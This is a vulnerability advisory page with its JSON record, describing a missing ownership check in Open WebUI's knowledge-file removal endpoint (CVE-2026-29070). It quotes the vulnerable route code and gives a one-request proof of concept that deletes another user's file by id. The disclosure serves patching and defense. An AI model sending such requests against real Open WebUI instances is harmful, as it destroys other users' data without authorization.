GHSA-26GM-93RW-CCHF

Vulnerability from github – Published: 2026-03-27 15:35 – Updated: 2026-03-27 15:35
VLAI?
Summary
Open WebUI has unauthorized deletion of knowledge files
Details

Summary

An access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id)

Details

The source code at https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:

@router.post("/{id}/file/remove", response_model=Optional[KnowledgeFilesResponse])
def remove_file_from_knowledge_by_id(
    id: str,
    form_data: KnowledgeFileIdForm,
    delete_file: bool = Query(True),
    user=Depends(get_verified_user),
    db: Session = Depends(get_session),
):
    knowledge = Knowledges.get_knowledge_by_id(id=id, db=db)
    [...]
    # Note  : Access control check on the knowledge base
    if (
        knowledge.user_id != user.id
        and not AccessGrants.has_access(
            user_id=user.id,
            resource_type="knowledge",
            resource_id=knowledge.id,
            permission="write",
            db=db,
        )
        and user.role != "admin"
    ):
        raise HTTPException(
            status_code=status.HTTP_400_BAD_REQUEST,
            detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
        )

    file = Files.get_file_by_id(form_data.file_id, db=db)
    [...]
    # Note : No checks on the file

    if delete_file:
        try:
            # Remove the file's collection from vector database
            file_collection = f"file-{form_data.file_id}"
            if VECTOR_DB_CLIENT.has_collection(collection_name=file_collection):
                VECTOR_DB_CLIENT.delete_collection(collection_name=file_collection)
        except Exception as e:
            log.debug("This was most likely caused by bypassing embedding processing")
            log.debug(e)
            pass

        # Delete file from database
        Files.delete_file_by_id(form_data.file_id, db=db)
[...]

PoC

Victim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1) Attacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b) Attacker deletes the victim file from their own collection:

POST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1
Host: gaius-neo-val.fr.space.corp
Authorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0
[...]

{"file_id":"9db6dcee-bb3b-483e-aaf3-310fda366af1"}

-----

HTTP/1.1 200 OK
[...]

The file is then deleted from the victim's knowledge base.

Impact

Arbitrary file deletion

Severity ?
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29070"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T15:35:19Z",
    "nvd_published_at": "2026-03-27T00:16:22Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id)\n\n### Details\nThe source code at https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:\n```\n@router.post(\"/{id}/file/remove\", response_model=Optional[KnowledgeFilesResponse])\ndef remove_file_from_knowledge_by_id(\n    id: str,\n    form_data: KnowledgeFileIdForm,\n    delete_file: bool = Query(True),\n    user=Depends(get_verified_user),\n    db: Session = Depends(get_session),\n):\n    knowledge = Knowledges.get_knowledge_by_id(id=id, db=db)\n    [...]\n    # Note  : Access control check on the knowledge base\n    if (\n        knowledge.user_id != user.id\n        and not AccessGrants.has_access(\n            user_id=user.id,\n            resource_type=\"knowledge\",\n            resource_id=knowledge.id,\n            permission=\"write\",\n            db=db,\n        )\n        and user.role != \"admin\"\n    ):\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n        )\n\n    file = Files.get_file_by_id(form_data.file_id, db=db)\n    [...]\n    # Note : No checks on the file\n\n    if delete_file:\n        try:\n            # Remove the file\u0027s collection from vector database\n            file_collection = f\"file-{form_data.file_id}\"\n            if VECTOR_DB_CLIENT.has_collection(collection_name=file_collection):\n                VECTOR_DB_CLIENT.delete_collection(collection_name=file_collection)\n        except Exception as e:\n            log.debug(\"This was most likely caused by bypassing embedding processing\")\n            log.debug(e)\n            pass\n\n        # Delete file from database\n        Files.delete_file_by_id(form_data.file_id, db=db)\n[...]\n```\n\n### PoC\nVictim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1)\nAttacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b)\nAttacker deletes the victim file from their own collection:\n```\nPOST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1\nHost: gaius-neo-val.fr.space.corp\nAuthorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0\n[...]\n\n{\"file_id\":\"9db6dcee-bb3b-483e-aaf3-310fda366af1\"}\n\n-----\n\nHTTP/1.1 200 OK\n[...]\n```\nThe file is then deleted from the victim\u0027s knowledge base.\n\n\n### Impact\nArbitrary file deletion",
  "id": "GHSA-26gm-93rw-cchf",
  "modified": "2026-03-27T15:35:19Z",
  "published": "2026-03-27T15:35:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29070"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has unauthorized deletion of knowledge files"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.